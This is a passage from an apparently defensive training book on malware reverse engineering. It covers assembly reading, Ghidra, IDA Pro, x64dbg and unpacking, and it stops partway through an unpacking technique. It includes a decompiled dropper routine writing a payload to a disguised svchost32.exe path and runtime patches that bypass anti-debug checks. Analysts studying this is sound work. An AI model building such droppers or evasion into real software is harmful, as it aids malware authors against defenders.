Lucent Grid Learning · Malware Analysis

Volume 2 of 2

Malware Analysis
Reverse Engineering

The specialist volume. Assumes Book 1 or equivalent experience. Read disassembled malware, defeat anti-analysis protections, unpack custom packers, reconstruct C2 protocols from raw bytes, and reverse engineer ransomware, rootkits, and RATs at the code level.

12 chapters

~3 hrs reading

Assembly required

Book 1 prerequisite

Two-Volume Series

Malware analysis is one of the broadest technical disciplines in security. This series is split into two books to cover the subject with the depth it deserves. Book 1 covers practitioner skills — triage, static and dynamic analysis, memory forensics, YARA, and detection engineering — and requires no assembly or reverse engineering knowledge. Book 2 (this volume) covers the specialist skills that begin where Book 1 ends.

Book 1

Foundations & Behavioural Analysis

Triage · Static analysis · Dynamic analysis · Memory forensics · YARA · Detection engineering · IOC extraction · IR integration

← Go to Book 1

You are here — Book 2

Reverse Engineering & Advanced Techniques

x86/x64 assembly · Ghidra · IDA Pro · x64dbg · Unpacking · Deobfuscation · Anti-analysis · Shellcode · Rootkits · Ransomware RE · C2 RE

Part I · Chapters 1–3

Assembly and Disassembly

The foundation of reverse engineering — reading x86/x64 assembly, navigating Ghidra, and using IDA Pro with x64dbg for dynamic debugging

Chapter 01 · ~18 min · Assembly & Disassembly Foundational RE

x86/x64 Assembly for Analysts

Registers and the stack, calling conventions, essential instruction set, reading function prologues and epilogues, identifying loops and conditionals in disassembly

Assembly language is the lowest level at which disassemblers show you code. You do not need to write assembly to be a malware analyst — you need to read it. The goal of this chapter is to build the mental model that lets you look at a disassembly listing and understand what the code is doing: what data it is operating on, where it came from, where it is going, and which logical structure it represents.

What a Disassembler Shows You

A disassembler reads the raw bytes of a binary and reconstructs the corresponding assembly instructions. Each line shows an address (where in memory this instruction lives), bytes (the raw encoding), a mnemonic (the human-readable operation name like MOV or CALL), and operands (what the operation acts on). The decompiler goes one step further and reconstructs a C-like pseudocode representation.

The Register Architecture

x86 (32-bit)	x64 (64-bit)	Size (bits)	Conventional use
EAX	RAX	32/64	Accumulator; return value from functions
EBX	RBX	32/64	General; callee-saved (must be preserved)
ECX	RCX	32/64	Counter (loops); 1st argument in x64 fastcall
EDX	RDX	32/64	Data; 2nd argument in x64 fastcall
ESI	RSI	32/64	Source index (string ops); 2nd arg in Linux x64
EDI	RDI	32/64	Destination index; 1st arg in Linux x64
ESP	RSP	32/64	Stack pointer; always points to top of stack
EBP	RBP	32/64	Base pointer; frame pointer in function prologue
n/a	R8–R15	64	Additional args (x64 only): R8=3rd, R9=4th

Sub-registers (lower portions of RAX):
    RAX (64-bit) → EAX (lower 32) → AX (lower 16) → AH/AL (high/low 8 bits)
    ; Writing to EAX zero-extends to RAX, a key x64 behaviour
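The sub-register rules can be checked with a few lines of Python. This is a minimal sketch that models RAX as a plain integer; the helper names (`write_eax`, `write_ax`, `write_al`) are illustrative only and do not come from any tool.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

def write_eax(rax: int, value: int) -> int:
    """A 32-bit write replaces the low half and clears bits 32-63 of RAX."""
    return value & 0xFFFFFFFF

def write_ax(rax: int, value: int) -> int:
    """A 16-bit write replaces bits 0-15 and preserves bits 16-63."""
    return (rax & ~0xFFFF & MASK64) | (value & 0xFFFF)

def write_al(rax: int, value: int) -> int:
    """An 8-bit write to AL replaces bits 0-7 and preserves bits 8-63."""
    return (rax & ~0xFF & MASK64) | (value & 0xFF)

rax = 0x1122334455667788
print(hex(write_eax(rax, 0xDEADBEEF)))  # 0xdeadbeef
print(hex(write_ax(rax, 0xBEEF)))       # 0x112233445566beef
print(hex(write_al(rax, 0xEF)))         # 0x11223344556677ef
```

Only the 32-bit write clears the upper half; 16-bit and 8-bit writes leave the rest of the register intact, which is why stale upper bits matter when reading code that mixes operand sizes.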

The Stack and Calling Conventions

The stack is a region of memory that grows downward (toward lower addresses). PUSH decrements the stack pointer and writes a value; POP reads a value and increments the stack pointer. The stack is how functions receive arguments (on x86), save return addresses, and preserve registers they modify.
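As a rough illustration of the PUSH/POP behaviour described above, here is a toy 64-bit stack in Python. The `Stack` class and the starting RSP value are assumptions made for the example.

```python
class Stack:
    """Toy model of a 64-bit stack: a dict of address -> value plus RSP."""

    def __init__(self, rsp: int = 0x14FF50):
        self.rsp = rsp
        self.mem = {}

    def push(self, value: int) -> None:
        self.rsp -= 8                 # the stack grows toward lower addresses
        self.mem[self.rsp] = value

    def pop(self) -> int:
        value = self.mem[self.rsp]
        self.rsp += 8
        return value

stack = Stack()
stack.push(0x401037)       # e.g. a return address
stack.push(0x2A)
print(hex(stack.rsp))      # 0x14ff40
print(hex(stack.pop()))    # 0x2a
print(hex(stack.pop()))    # 0x401037
print(hex(stack.rsp))      # 0x14ff50
```

Values come back in the reverse order they were pushed, and RSP ends where it started, which is the balance every well-formed function maintains.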

Calling Convention: x86 stack-based calls vs x64 Windows fastcall, and where arguments live

x86 (32-bit Windows): arguments are pushed right to left onto the stack. Win32 API functions such as CreateFileA use stdcall (the callee pops its arguments); cdecl pushes in the same order but leaves the cleanup to the caller.

    ; C: result = CreateFile(lpFileName, dwAccess, dwShare, lpSec, dwCreate, dwFlags, hTemplate)
    00401020  6A 00                 push 0                    ; hTemplateFile = NULL
    00401022  68 80 00 00 00        push 80h                  ; dwFlagsAndAttributes
    00401027  6A 02                 push 2                    ; dwCreationDisposition = CREATE_ALWAYS
    00401029  6A 00                 push 0                    ; lpSecurityAttributes = NULL
    0040102B  6A 00                 push 0                    ; dwShareMode
    0040102D  68 00 00 00 40        push 40000000h            ; dwDesiredAccess = GENERIC_WRITE
    00401032  68 F0 20 40 00        push offset filename_str  ; lpFileName
    00401037  FF 15 A0 20 40 00     call ds:CreateFileA

x64 fastcall (64-bit Windows): first 4 args in RCX, RDX, R8, R9; the rest go on the stack above the 32-byte shadow space.

    ; C: WriteFile(hFile, lpBuffer, nBytes, lpWritten, lpOverlapped)
    0000000140001A20  48 8B C8                    mov rcx, rax                ; hFile (arg 1)
    0000000140001A23  48 8D 15 xx xx xx xx        lea rdx, [buffer]           ; lpBuffer (arg 2)
    0000000140001A2A  41 B8 00 10 00 00           mov r8d, 1000h              ; nNumberOfBytesToWrite (arg 3)
    0000000140001A30  4C 8D 4D F8                 lea r9, [rbp-8]             ; lpNumberOfBytesWritten (arg 4)
    0000000140001A34  48 C7 44 24 20 00 00 00 00  mov qword ptr [rsp+20h], 0  ; lpOverlapped = NULL (arg 5, on the stack)
    0000000140001A3D  FF 15 xx xx xx xx           call cs:WriteFile
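When annotating a call site, it helps to map each parameter of the documented signature to the place it lives at the CALL instruction. The sketch below does that for integer and pointer arguments only (floating-point arguments use XMM registers and are ignored here); `arg_location` is a hypothetical helper, not part of any tool.

```python
WIN64_REGS = ["RCX", "RDX", "R8", "R9"]
SYSV_REGS = ["RDI", "RSI", "RDX", "RCX", "R8", "R9"]

def arg_location(index: int, abi: str = "win64") -> str:
    """Location of integer/pointer argument `index` (1-based) at the CALL instruction."""
    if abi == "win64":
        if index <= len(WIN64_REGS):
            return WIN64_REGS[index - 1]
        # stack arguments sit above the 32-byte shadow space
        return "[RSP+%Xh]" % (0x20 + 8 * (index - 5))
    if abi == "sysv":
        if index <= len(SYSV_REGS):
            return SYSV_REGS[index - 1]
        return "[RSP+%Xh]" % (8 * (index - 7))
    raise ValueError("unknown ABI: %s" % abi)

WRITEFILE_PARAMS = ["hFile", "lpBuffer", "nNumberOfBytesToWrite",
                    "lpNumberOfBytesWritten", "lpOverlapped"]
for i, name in enumerate(WRITEFILE_PARAMS, start=1):
    print("%-24s %s" % (name, arg_location(i)))
```

For WriteFile this prints RCX, RDX, R8, R9 and then `[RSP+20h]` for lpOverlapped, which is the slot to look for when a fifth argument seems to be missing from the register setup.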

The Function Prologue and Epilogue

Most compiled functions begin with a prologue that sets up the stack frame and end with an epilogue that tears it down; small leaf functions that need no stack space may have neither. Recognising these patterns lets you quickly identify function boundaries in a disassembly listing.

Function Structure: prologue, local variable access, and epilogue patterns (x64)

Function prologue (x64):
    0000000140001000  48 89 5C 24 08        mov [rsp+8], rbx           ; save callee-saved reg
    0000000140001005  48 89 6C 24 10        mov [rsp+10h], rbp
    000000014000100A  48 81 EC A0 00 00 00  sub rsp, 0A0h              ; allocate stack frame (local vars)
    0000000140001011  48 8D 6C 24 20        lea rbp, [rsp+20h]         ; set frame pointer

Accessing local variables (relative to RBP or RSP):
    0000000140001020  C7 45 00 00 00 00 00  mov dword ptr [rbp+0], 0   ; local at [rbp+0] = 0
    0000000140001027  48 8B 45 20           mov rax, [rbp+20h]         ; load a second local, at [rbp+20h], into rax

Function epilogue:
    0000000140001090  48 8D A5 80 00 00 00  lea rsp, [rbp+80h]         ; restore stack pointer
    0000000140001097  48 8B 5C 24 08        mov rbx, [rsp+8]           ; restore saved registers
    000000014000109C  48 8B 6C 24 10        mov rbp, [rsp+10h]
    00000001400010A1  C3                    ret                        ; return to caller
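The epilogue's `lea rsp, [rbp+80h]` only makes sense once the prologue arithmetic is replayed. A short worked calculation, assuming an arbitrary RSP value on entry (`frame_pointers` is a name invented for this sketch):

```python
def frame_pointers(entry_rsp: int, frame_size: int = 0xA0, rbp_offset: int = 0x20):
    """Replay the prologue arithmetic; return (rsp, rbp) as seen in the function body."""
    rsp = entry_rsp - frame_size      # sub rsp, 0A0h
    rbp = rsp + rbp_offset            # lea rbp, [rsp+20h]
    return rsp, rbp

entry_rsp = 0x14FF48                  # hypothetical RSP on function entry
rsp, rbp = frame_pointers(entry_rsp)
restored = rbp + 0x80                 # lea rsp, [rbp+80h] in the epilogue
print(hex(rsp), hex(rbp), hex(restored))   # 0x14fea8 0x14fec8 0x14ff48
```

Because 0x20 + 0x80 equals the 0xA0 frame size, the epilogue lands exactly on the entry RSP, so the saved RBX and RBP are read back from the same `[rsp+8]` and `[rsp+10h]` slots the prologue wrote.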

Identifying Loops and Conditionals

Control Flow Patterns: how C-level loops and conditionals look in disassembly

C: if (eax == 0) { do_something(); }
    00401050  85 C0        test eax, eax          ; eax AND eax → sets ZF if eax == 0
    00401052  75 0A        jnz 0040105E           ; jump if NOT zero → skip the if() body
    00401054  E8 xx xx     call do_something      ; ← only reached if eax was 0
    0040105E  ...                                 ; ← code after the if block

C: for (i = 0; i < count; i++) { process(buf[i]); }
    00401080  33 C9        xor ecx, ecx           ; ecx = 0 (i initialisation)
    00401082                                      ; ← loop top label
    00401082  3B CA        cmp ecx, edx           ; compare i vs count
    00401084  7D 10        jge 00401096           ; if i >= count (signed) → exit loop
    00401086  8B 04 8B     mov eax, [ebx+ecx*4]   ; eax = buf[i] (4-byte elements)
    00401089  50           push eax               ; push buf[i] as argument
    0040108A  E8 xx xx     call process
    0040108F  41           inc ecx                ; i++
    00401090  EB F0        jmp 00401082           ; jump back to loop top
    00401096                                      ; ← after loop
    ; Simplified for readability: real compiler output keeps i and count in callee-saved
    ; registers (e.g. ESI/EDI), because the callee is free to overwrite ECX and EDX.

XOR decryption loop (extremely common in malware):
    00401100  33 C9        xor ecx, ecx           ; counter = 0
    00401102  8A 04 0E     mov al, [esi+ecx]      ; al = encrypted_buf[i]
    00401105  34 4A        xor al, 4Ah            ; XOR with key byte 0x4A ← KEY IS HERE
    00401107  88 04 0F     mov [edi+ecx], al      ; decrypted_buf[i] = al
    0040110A  41           inc ecx                ; i++
    0040110B  3B CA        cmp ecx, edx           ; compare i vs length
    0040110D  72 F3        jb 00401102            ; jump back if i < length (unsigned)
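The loops above end in different conditional jumps: JGE reads the signed-comparison flags and JB the unsigned one. A minimal sketch of how CMP sets those flags and how a few Jcc instructions read them; `cmp_flags` and `taken` are illustrative helpers, and only the jumps used in this chapter are modelled.

```python
def cmp_flags(a: int, b: int, bits: int = 32) -> dict:
    """Flags produced by CMP a, b (computes a - b and discards the result)."""
    mask = (1 << bits) - 1
    sign = 1 << (bits - 1)
    a &= mask
    b &= mask
    result = (a - b) & mask
    return {
        "ZF": result == 0,
        "SF": bool(result & sign),
        "CF": a < b,                                  # unsigned borrow
        "OF": bool((a ^ b) & (a ^ result) & sign),    # signed overflow
    }

def taken(jcc: str, f: dict) -> bool:
    """Whether the named conditional jump is taken for the given flags."""
    return {
        "jz": f["ZF"], "jnz": not f["ZF"],
        "jb": f["CF"], "jae": not f["CF"],            # unsigned comparisons
        "jl": f["SF"] != f["OF"], "jge": f["SF"] == f["OF"],  # signed comparisons
    }[jcc]

print(taken("jge", cmp_flags(3, 5)))           # False: i < count, loop continues
print(taken("jge", cmp_flags(5, 5)))           # True: loop exits
print(taken("jb", cmp_flags(0xFFFFFFFF, 1)))   # False: 4294967295 is not below 1
print(taken("jl", cmp_flags(0xFFFFFFFF, 1)))   # True: as signed, -1 < 1
```

The last two lines show why the choice of jump matters: the same register values compare differently depending on whether the compiler treated them as signed or unsigned.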

Essential Instructions — Analyst Reference

Instruction	Operation	Flags Set	Common Use
`MOV dst, src`	Copy src into dst	None	Move data between registers/memory
`LEA dst, [expr]`	Load Effective Address — computes address, doesn't dereference	None	Pointer arithmetic, fast multiply
`PUSH / POP`	Write to/read from top of stack, adjust RSP	None	Save registers, pass arguments (x86)
`CALL target`	Push return address, jump to target	None	Function call
`RET`	Pop return address from stack, jump to it	None	Function return
`ADD / SUB`	Add/subtract; result in destination	CF, ZF, SF, OF	Arithmetic, pointer adjustment
`XOR dst, src`	Bitwise exclusive OR	ZF, SF; CF=0, OF=0	Decryption, `XOR reg, reg` = zero register
`AND / OR`	Bitwise AND/OR	ZF, SF; CF=0, OF=0	Masking flags, bit manipulation
`TEST dst, src`	Bitwise AND without storing result; sets flags only	ZF, SF; CF=0, OF=0	`TEST eax, eax` checks if eax is zero
`CMP dst, src`	Subtraction without storing result — sets flags only	CF, ZF, SF, OF	Comparison before conditional jump
`JMP / Jcc`	Unconditional/conditional jump based on flags	None	Loops, branches, if/else
`SHL / SHR`	Shift left/right (multiply/divide by powers of 2)	CF, ZF, SF	Bit manipulation, fast multiply
`INC / DEC`	Increment/decrement by 1	ZF, SF, OF	Loop counters
`REP MOVS / STOS`	Repeated move/store using RCX as counter	None	memcpy/memset equivalents — common in shellcode

Key Takeaways — Chapter 1

In x64 Windows, function arguments go RCX → RDX → R8 → R9 → stack; recognising this pattern lets you match each register at a call site to the corresponding parameter in the API's documented signature
TEST eax, eax followed by JZ / JNZ is the most common null/zero check pattern; it typically follows calls that return a BOOL, a pointer, or a status code (APIs that signal failure with INVALID_HANDLE_VALUE, such as CreateFile, are checked with CMP against -1 instead)
An XOR loop with a single-byte immediate value is almost always a decoding routine, and the immediate value is the key; write a Python script to decrypt the data before spending time on further analysis
Writing to EAX automatically zero-extends to RAX in x64 — this is why you frequently see MOV eax, ... in 64-bit code even when the value is used in a 64-bit context
The function prologue pattern (SUB RSP, N or register saves followed by local variable setup) immediately identifies function entry points when auto-analysis misses them

Go Deeper

cdecl.org: C declaration decoder (translates C declarations to and from English; despite the name, not a calling-convention reference)
Microsoft: x64 calling convention documentation

Chapter 02 · ~17 min · Assembly & Disassembly Core Tool

Ghidra from Zero

Project setup and auto-analysis, CodeBrowser navigation, disassembly vs decompiler view, renaming and retyping, cross-references, and the iterative RE workflow

Ghidra is the NSA-developed, open-source reverse engineering framework that has become the primary free tool for malware analysts. It combines disassembly, decompilation, a scripting engine, and a collaborative analysis platform in a single application. This chapter covers the complete workflow from opening a binary for the first time to arriving at a readable, annotated decompilation of its key functions.

Project Setup and Initial Analysis

Ghidra: opening a binary and running initial auto-analysis

1. File → New Project → Non-Shared Project → name it
2. File → Import File → select sample.exe
   Ghidra detects: PE 64-bit, Windows, x86-64
3. Double-click imported file → opens CodeBrowser
4. Prompted: "Analyze?" → YES → run with default options

Auto-analysis runs:
    Disassembler          → converts bytes to instructions
    Function Discovery    → identifies function boundaries
    Data Reference        → finds strings, globals, imports
    Decompiler Parameter  → improves decompiled output
    PDB Analyzer          → loads symbols if PDB available

Analysis time: 30s–5min depending on binary size
After analysis: ~2,000 functions identified in a typical medium-size sample

Key windows (arrange to your preference):
    Listing          → disassembly view (the assembly)
    Decompiler       → C-like pseudocode (right pane, sync'd with Listing)
    Symbol Tree      → imports, exports, functions, labels
    Defined Strings  → all extracted strings
    Program Trees    → sections / segments

Reading the Decompiler View

Ghidra Decompiler — FUN_00401000 (before renaming)

    undefined8 FUN_00401000(undefined8 param_1, undefined8 param_2)
    {
        HANDLE hFile;
        undefined4 uVar1;
        undefined8 uVar2;
        BOOL BVar3;
        DWORD local_14;

        hFile = CreateFileW(param_1, 0x40000000, 0, (LPSECURITY_ATTRIBUTES)0x0, 2, 0x80, (HANDLE)0x0);
        if (hFile == (HANDLE)0xffffffffffffffff) {    // INVALID_HANDLE_VALUE
            return 0;
        }
        BVar3 = WriteFile(hFile, param_2, DAT_00403050, &local_14, (LPOVERLAPPED)0x0);
        CloseHandle(hFile);
        return (undefined8)BVar3;
    }
    // ↑ This is the dropper's file-write function. Rename: write_payload_to_disk

The Iterative RE Workflow — Renaming and Retyping

Raw Ghidra output is hard to read. FUN_00401000, param_1, uVar2: these names carry no information. The core RE workflow is iterative annotation: identify what a function or variable is, rename it to something meaningful, and watch the decompilation of its callers become clearer as a result.

Ghidra Annotation Workflow: keyboard shortcuts and annotation techniques

Rename a function (in Listing or Decompiler):
    Click on function name → press L → type new name → Enter
    FUN_00401000 → write_payload_to_disk

Rename a variable (in Decompiler view):
    Click on variable → press L → type new name
    param_1 → target_path, param_2 → payload_data

Retype a variable (fix incorrect type inference):
    Click on variable → press Ctrl+L → enter correct type
    undefined4 → DWORD, undefined8* → LPWSTR
    (Correct typing dramatically improves decompiler output for that variable)

Cross-references (finding all callers of a function):
    Right-click function name → References → Find References to...
    → shows every call site: which function calls write_payload_to_disk and with what args

Defined Strings window (fastest way to find interesting functions):
    Window → Defined Strings
    Sort by string content, find "C:\ProgramData\..." or "http://..."
    Double-click string → jumps to its location in .rdata
    Press Ctrl+Shift+F (References → Show References to Address; X is the IDA shortcut, not Ghidra's default) → shows the function that loads this string
    → Navigate there → that's the function that uses the C2 URL

After Annotation — The Readable Function

Ghidra Decompiler — write_payload_to_disk (after renaming)

    BOOL write_payload_to_disk(LPWSTR target_path, LPVOID payload_data)
    {
        HANDLE hFile;
        BOOL write_ok;
        DWORD bytes_written;

        hFile = CreateFileW(target_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE) {
            return FALSE;    // file open failed
        }
        write_ok = WriteFile(hFile, payload_data, payload_size, &bytes_written, NULL);
        CloseHandle(hFile);
        return write_ok;     // returns TRUE on success
    }
    // Called from: drop_and_execute() with path=C:\ProgramData\MsUpdate\svchost32.exe
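The named constants in the annotated listing are the same numbers that appear in the raw decompilation (0x40000000, 2, 0x80). A small lookup sketch for decoding them; the tables cover only a handful of common values, and `decode_flags` is a hypothetical helper.

```python
DESIRED_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FILE_ATTRIBUTES = {
    0x01: "FILE_ATTRIBUTE_READONLY",
    0x02: "FILE_ATTRIBUTE_HIDDEN",
    0x04: "FILE_ATTRIBUTE_SYSTEM",
    0x80: "FILE_ATTRIBUTE_NORMAL",
}

def decode_flags(value: int, table: dict) -> str:
    """Render a bit-flag value as the OR of its named bits (hex if none match)."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    return " | ".join(names) if names else hex(value)

print(decode_flags(0x40000000, DESIRED_ACCESS))        # GENERIC_WRITE
print(CREATION_DISPOSITION[2])                         # CREATE_ALWAYS
print(decode_flags(0x80, FILE_ATTRIBUTES))             # FILE_ATTRIBUTE_NORMAL
print(decode_flags(0xC0000000, DESIRED_ACCESS))        # GENERIC_WRITE | GENERIC_READ
```

In Ghidra the same substitution is usually done by applying the equate or the correct function signature; the lookup is useful when reading raw listings or writing triage scripts.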

Key Takeaways — Chapter 2

The Defined Strings window is the fastest entry point — find the C2 URL or a persistence path string, cross-reference it, and you land directly in the function that matters most
Rename aggressively and early — every renamed function and variable improves the readability of its callers; the analysis compounds as you work outward from known functions
Retyping variables from undefined8 to the correct Windows type dramatically improves decompiler output — LPWSTR vs undefined8* tells Ghidra how to display the data
Cross-references (Ctrl+Shift+F or right-click → References in the Listing and Decompiler) show you every call site; use them to build the call graph from interesting functions outward to their callers
The iterative workflow — identify a known API call, rename the function that calls it based on what it does, follow cross-references to that function's callers — is the core RE loop that eventually covers the whole binary

Chapter 03 · ~16 min · Assembly & Disassembly Core Tools

IDA Pro and x64dbg

Where IDA and Ghidra differ, graph view, FLIRT signatures for library recognition, x64dbg for dynamic debugging — breakpoints, stepping, memory inspection, runtime patching

IDA Pro is the industry standard disassembler in professional malware analysis and vulnerability research. Ghidra is the free alternative that has closed most of the gap. This chapter covers the IDA-specific capabilities that remain useful alongside Ghidra, and introduces x64dbg — the dynamic debugger that lets you execute malware instruction by instruction and inspect its state at any point.

Where IDA Differs from Ghidra

Capability	IDA Pro	Ghidra
Graph view	Excellent — the original; highly readable CFG with colour-coded edges	Good — available but less mature than IDA's
FLIRT signatures	Extensive library — identifies statically-linked code from hundreds of compilers/libraries	FunctionID (limited); third-party FLIRT imports possible
Decompiler	Hex-Rays (paid add-on) — generally produces cleaner output, especially for x64	Built-in free decompiler — excellent for a free tool; occasionally produces odd output
Scripting	IDAPython — mature, large ecosystem of community scripts	Java and Python — equally capable; growing ecosystem
Cost	$3,000–$15,000+ per seat	Free and open source
Collaborative analysis	IDA Teams (paid)	Built-in shared project support

IDA Graph View — Reading Control Flow

IDA Pro Graph View: understanding the control flow graph and its colour coding

In IDA: press Space to toggle between Listing and Graph views

Graph view elements:
    Each node   = a basic block (straight-line sequence with no branches inside it)
    Green edge  = conditional jump taken (JZ when ZF=1)
    Red edge    = conditional jump NOT taken (fall-through)
    Blue edge   = unconditional jump (JMP)
    Dashed edge = indirect call (can't statically resolve)

Pattern recognition in graph view:
    Diamond shape → if/else (two branches that rejoin)
    Loop with back-edge → for/while loop
    Many small blocks with jumps to same target → switch statement
    Single node → very small function
    One hub block that every other block jumps back to → flattened CFG (heavy obfuscation)

FLIRT signature application:
    File → Load File → FLIRT Signature File → select appropriate .sig
    Before: sub_401A00 → After: _memcpy_s (library code, skip it)
    Before: sub_401C40 → After: strlen (library code, skip it)
    Focus analysis on functions NOT matched by FLIRT: those are the malware's own code
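The nodes that graph view draws can be derived with the classic "leader" rule: a block starts at the first instruction, at every jump target, and at every instruction following a jump. The sketch below applies that rule to the for-loop listing from Chapter 1; the tuple format, the `basic_blocks` function, and the trailing `ret` at 0x401096 are assumptions for the example, not IDA's API.

```python
def basic_blocks(instructions):
    """Split (address, mnemonic, branch_target) tuples into basic blocks."""
    addrs = [addr for addr, _, _ in instructions]
    leaders = {addrs[0]}
    for i, (_, mnemonic, target) in enumerate(instructions):
        if mnemonic.startswith("j"):          # JMP or any conditional jump
            if target is not None:
                leaders.add(target)           # a jump target starts a block
            if i + 1 < len(instructions):
                leaders.add(addrs[i + 1])     # so does the instruction after a jump
    blocks, current = [], []
    for addr in addrs:
        if addr in leaders and current:
            blocks.append(current)
            current = []
        current.append(addr)
    blocks.append(current)
    return blocks

LOOP = [
    (0x401080, "xor", None),
    (0x401082, "cmp", None),
    (0x401084, "jge", 0x401096),
    (0x401086, "mov", None),
    (0x401089, "push", None),
    (0x40108A, "call", None),
    (0x40108F, "inc", None),
    (0x401090, "jmp", 0x401082),
    (0x401096, "ret", None),      # hypothetical instruction after the loop
]
for block in basic_blocks(LOOP):
    print([hex(a) for a in block])
```

The loop splits into four blocks (initialisation, the comparison, the body, and the exit); the edge from the body back to the comparison block is the back-edge that identifies a loop in graph view.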

x64dbg — Dynamic Debugging

x64dbg executes the malware inside a controlled environment and lets you pause execution at any point, inspect registers and memory, modify values, and step instruction by instruction. This is essential when static analysis can't determine what a function does — just run it and watch.

x64dbg Workflow: breakpoints, stepping, memory inspection, and runtime patching

Opening a sample in x64dbg:
    File → Open → select sample.exe
    x64dbg pauses at the system breakpoint (before entry point)
    Press F9 (Run) → pauses at the entry point (EP)

Breakpoint types:
    Software BP (F2): overwrites the first instruction byte with INT3 (0xCC); visible to malware that checksums or scans its own code
    Hardware BP (right-click → Breakpoint → Set Hardware on Execution): uses the CPU debug registers and leaves the code bytes untouched, so it is harder to detect
    Memory BP: fires when a memory region is read/written/executed
    Note: IsDebuggerPresent does not look for breakpoints; it reads the BeingDebugged flag in the PEB

Stepping controls:
    F7      → Step Into (execute one instruction; enters CALL)
    F8      → Step Over (execute one instruction; does NOT enter CALL)
    F9      → Run (execute until next breakpoint)
    Ctrl+F9 → Run until return (execute current function to its RET)

Inspecting state after pausing:
    Registers pane: RAX=0x0000000000000001, RCX=0x7FF8A3C0B020...
    Right-click RAX → Follow in Dump → memory contents at RAX address
    Right-click on stack entry → Follow in Dump → see string argument value

Runtime patching (defeat an anti-debug check):
    Execution reaches: test eax, eax → jnz exit_if_debugger
    After IsDebuggerPresent returns, RAX=1 (debugger detected)
    Fix: right-click RAX in registers → Modify → set to 0
    Or: right-click JNZ instruction → Assemble → replace with NOP NOP
    Execution continues past the check → malware proceeds normally
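A software breakpoint changes the code bytes in memory, which is what makes it visible to a sample that checksums itself. The sketch below models that with the XOR-loop bytes from Chapter 1 and a CRC32; `set_software_breakpoint` is an illustrative stand-in for what a debugger does, and the self-check is an assumed anti-debug technique, not one taken from a specific sample.

```python
import zlib

INT3 = 0xCC

def set_software_breakpoint(code: bytearray, offset: int) -> int:
    """Overwrite one byte with INT3, as a debugger does; return the original byte."""
    original = code[offset]
    code[offset] = INT3
    return original

# Bytes of the XOR decryption loop from Chapter 1 (xor ecx,ecx ... jb)
code = bytearray.fromhex("33C98A040E344A88040F413BCA72F3")
baseline = zlib.crc32(bytes(code))            # what a self-checking sample would store

saved = set_software_breakpoint(code, 2)      # breakpoint on the MOV at offset 2
print(zlib.crc32(bytes(code)) != baseline)    # True: the checksum no longer matches
print(INT3 in code)                           # True: a scan for 0xCC also finds it

code[2] = saved                               # the debugger restores the byte on removal
print(zlib.crc32(bytes(code)) == baseline)    # True
```

A hardware breakpoint on the same address would leave `code` unchanged, so neither check would notice it; samples that want to catch hardware breakpoints have to inspect the debug registers instead.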

Useful x64dbg Keyboard Reference

x64dbg Quick Reference: most-used shortcuts during a malware debugging session

Navigation:
    Ctrl+G    → Go to address (enter VA or symbol name)
    Ctrl+F    → Find in current module (search bytes/strings)
    Enter     → Follow jump / call target in disassembly
    Minus (-) → Navigate back (undo last jump)

Execution:
    F2        → Toggle software breakpoint at cursor
    F7        → Step Into (enter CALL targets)
    F8        → Step Over (execute CALL as one step)
    F9        → Run until next breakpoint
    Ctrl+F9   → Run until return (execute current function)
    F4        → Run to cursor (temp BP at cursor line)

Inspection and patching:
    Space     → Assemble (patch instruction at cursor)
    Ctrl+E    → Edit data at selected bytes
    Right-click reg → Modify (change register value inline)
    Ctrl+D    → Follow in dump (view memory at address)

Breakpoints:
    Alt+B     → Open the Breakpoints view
    Right-click → HW breakpoint → set hardware BP (no INT3)
    Right-click memory region → Breakpoint → Execute → memory exec BP

Combining Static and Dynamic Analysis

The most effective RE workflow alternates between Ghidra and x64dbg. Ghidra gives you the big picture — all functions, all strings, the call graph. x64dbg fills in what static analysis can't determine — the runtime value of computed expressions, the result of API calls, the contents of dynamically allocated buffers. When a Ghidra function is confusing, set a breakpoint in x64dbg at its entry and step through it while watching the registers.

Key Takeaways — Chapter 3

IDA's FLIRT signatures identify statically-linked library code — functions matched by FLIRT are not malware logic and can be skipped; focus analysis on unmatched functions
Graph view makes control flow immediately visible — the diamond shape is if/else, the back-edge is a loop; these patterns are identifiable in seconds without reading every instruction
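Hardware breakpoints are preferable to software breakpoints when analysing samples that check for debuggers: they use CPU debug registers and do not insert INT3 (0xCC) bytes that a code checksum or byte scan can detect. IsDebuggerPresent is a separate check that reads the PEB BeingDebugged flag regardless of breakpoint type, and it still has to be patched or bypassed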
Runtime patching in x64dbg — modifying a register value or NOP-ing a conditional jump — is the fastest way to bypass anti-analysis checks during dynamic analysis; changes are in-memory and don't affect the file on disk
The static-dynamic loop: analyse in Ghidra to understand structure → set x64dbg breakpoints at interesting functions → observe runtime behaviour → update Ghidra annotations with observed values → repeat

Part II · Chapters 4–6

Unpacking and Deobfuscation

Getting to the real code — manual unpacking to the original entry point, defeating XOR and custom encodings, and reconstructing hidden import tables

Chapter 04 · ~16 min · Unpacking & Deobfuscation Advanced Static

Unpacking in Depth

The OEP concept, manual unpacking workflow in x64dbg, PE reconstruction with Scylla, unpacking common packers, and automated unpacking frameworks

Book 1 showed how to detect packing and unpack UPX with a single command. This chapter covers what to do when that command fails — when the sample uses a custom packer, a renamed UPX stub, or a commercial protector. The technique is universal: let the packer do its job inside the debugger, identify the moment it hands control to the original code, and dump the process memory at that moment to recover the unpacked binary.

The OEP — Original Entry Point

A packed binary has two entry points. The packer entry point is where execution begins — it runs the decompression or decryption stub. The Original Entry Point (OEP) is where the real malware code begins, after the packer has finished its work. The goal of manual unpacking is to pause execution exactly at the OEP, at which point the unpacked binary exists in memory and can be dumped.

Finding the OEP — Three Techniques

OEP Discovery: three approaches (ESP trick, memory BP on the unpacked region, tail jump recognition)

Technique 1: the ESP trick (most reliable for simple packers):
    1. Open the packed sample in x64dbg and run to the entry point (packer stub)
    2. Step over (F8) the stub's initial register saves (typically PUSHAD on x86)
    3. Note the new ESP/RSP value (e.g. 0x0014FF50) → right-click it → Follow in Dump
    4. Set a hardware BP on access (dword) on that stack location
    5. Press F9 (Run): the packer executes
